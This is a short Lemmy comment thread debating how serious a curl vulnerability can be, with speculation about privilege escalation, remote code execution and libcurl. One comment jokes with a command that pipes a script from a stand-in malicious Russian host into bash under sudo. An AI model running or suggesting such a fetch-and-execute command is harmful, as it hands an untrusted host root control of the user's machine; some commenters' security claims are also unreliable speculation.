• PowerCrazy@lemmy.ml
    link
    fedilink
    arrow-up
    0
    arrow-down
    2
    ·
    1 year ago

    I don’t see how a vulnerability in Curl can exist at all unless it’s privilege escalation (you don’t run curl as root do you?) And if it’s not a privilege escalation, then it sounds like it’s just a “root user can do things that you can do as root, possibly unintended” which isn’t a vulnerability at all.

    sudo curl www.badactor.ru/hackme | bash !!!

    • nathris@lemmy.ca
      link
      fedilink
      arrow-up
      0
      ·
      1 year ago

      Could be an RCE exploit. Doesn’t matter if it’s privilege escalation at that point because it can be used to execute a payload that can.

      • PowerCrazy@lemmy.ml
        link
        fedilink
        arrow-up
        0
        arrow-down
        2
        ·
        1 year ago

        I’ll admit i’m out of my depth about exactly how curl works on the local system, but surely if there is a vulnerability in the “libcurl” library that is much more serious and severe then just saying “curl” is vulnerable.

        I’m assuming that libcurl touches a huge amount of the linux network stack.